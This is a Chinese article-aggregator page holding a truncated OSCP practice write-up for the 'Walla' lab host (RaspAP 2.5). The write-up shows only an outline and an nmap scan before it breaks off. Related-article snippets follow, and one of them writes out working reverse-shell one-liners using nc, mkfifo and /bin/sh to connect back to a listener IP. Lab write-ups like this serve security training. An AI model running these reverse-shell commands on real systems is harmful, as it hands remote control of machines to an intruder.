OSCP-Walla(RaspAP 2.5)

这篇具有很好参考价值的文章主要介绍了OSCP-Walla(RaspAP 2.5)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

扫描

Web

反弹shell

提权文章来源地址https://www.toymoban.com/news/detail-425503.html


扫描

sudo nmap 192.168.233.97 -p- -sS -sV

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
23/tcp    open  telnet     Linux telnetd
25/tcp    open  smtp       Postfix smtpd
53/tcp    open  tcpwrapped
422/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
8091/tcp  open  http       lighttp

到了这里,关于OSCP-Walla(RaspAP 2.5)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 交互式shell与非交互式shell,反弹shell

    交互shell就是shell等待你的输入,并且立即执行你提交的命令。 这种模式被称作交互式是因为shell与用户进行交互。 这种模式也是大多数用户非常熟悉的:登录、执行一些命令、签退。当签退后,shell也终止了。 需要进行信息交互,例如输入某个信息 会返回信息 你需要对其输

    2024年02月02日
    浏览(53)
  • 入侵检测——如何实现反弹shell检测?

    反弹shell的本质:就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 反弹shell的结果:一个client上的bash进程 可以和 server上的进程通信。

    2024年02月13日
    浏览(44)
  • Windows的几种常用反弹shell方法

    简介:shell类似于DOS下的COMMAND.COM和后来的cmd.exe,它接收用户命令,然后调用相应的应用程序,也可以通俗的说是命令执行环境。分为交互式shell,与非交互式shell。 交互shell就是shell等待你的输入,并且立即执行你提交的命令,这种模式被称作交互式是因为shell与用户进行交互

    2024年02月12日
    浏览(45)
  • kali /mac 成功的反弹shell语句

    mac :192.168.19.107 kali:192.168.19.111 kali 监听mac : nc -lvvp 6666 mac执行: 1: mknod backpipe p nc 192.168.19.111 6666 0backpipe | /bin/bash 1backpipe  2: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 21|nc 192.168.19.111 6666 /tmp/f 3: rm -f /tmp/p; mknod /tmp/p p nc 192.168.19.111 6666 0/tmp/p 21 该语句在监听机器上执行的语句会同步

    2024年04月22日
    浏览(32)
  • 通过python获取靶机的反弹Shell [靶机实战]

    Kali:172.30.1.3/24 靶机(Funbox9):172.30.1.129/24 通过nmap扫描此主机,我们需要获取到开放的端口以及服务的Banner  通过扫描我们发现,目标主机开放着21端口,服务Banner是 vsftpd 2.3.4,并且允许匿名登录 我们尝试ftp匿名连接此主机:  根据其返回信息,我们发现了一个可能是一个本

    2024年02月06日
    浏览(35)
  • 漏洞复现 || Hadoop未授权访问反弹Shell漏洞

    技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或

    2024年02月16日
    浏览(44)
  • 通过nc获取靶机的反弹Shell [靶机实战]

    Kali:172.30.1.3/24 靶机(Funbox9):172.30.1.129/24 通过nmap扫描此主机,我们需要获取到开放的端口以及服务的Banner  通过扫描我们发现,目标主机开放着21端口,服务Banner是 vsftpd 2.3.4,并且允许匿名登录 我们尝试ftp匿名连接此主机:  根据其返回信息,我们发现了一个可能是一个本

    2024年02月06日
    浏览(95)
  • 【安全知识】——LInux的shell反弹姿势合集(更新中)

    作者名:白昼安全 主页面链接: 主页传送门 座右铭: 不要让时代的悲哀成为你的悲哀 专研方向: web安全,后渗透技术 每日鸡汤:  宇宙有宇宙的规律,我也有我的坚持 当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况

    2024年02月05日
    浏览(32)
  • web安全学习笔记【05】——反弹Shell、正反向连接

    思维导图 #知识点: 1、Web常规-系统中间件数据库源码等 2、Web其他-前后端软件Docker分配站等 3、Web拓展-CDNWAFOSS反向负载均衡等 ----------------------------------- 1、APP架构-封装原生态H5flutter等 2、小程序架构-WebH5JSVUE框架等 ----------------------------------- 1、渗透命令-常规命令文件上传

    2024年01月25日
    浏览(32)
  • 持久化反弹一个能使用方向键的shell

    服务端 被控端 提升到pty 进一步提升可以使用tab,方向键,ctrl+c SEGINT等 服务端 被控端 参考:https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

    2024年02月15日
    浏览(42)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包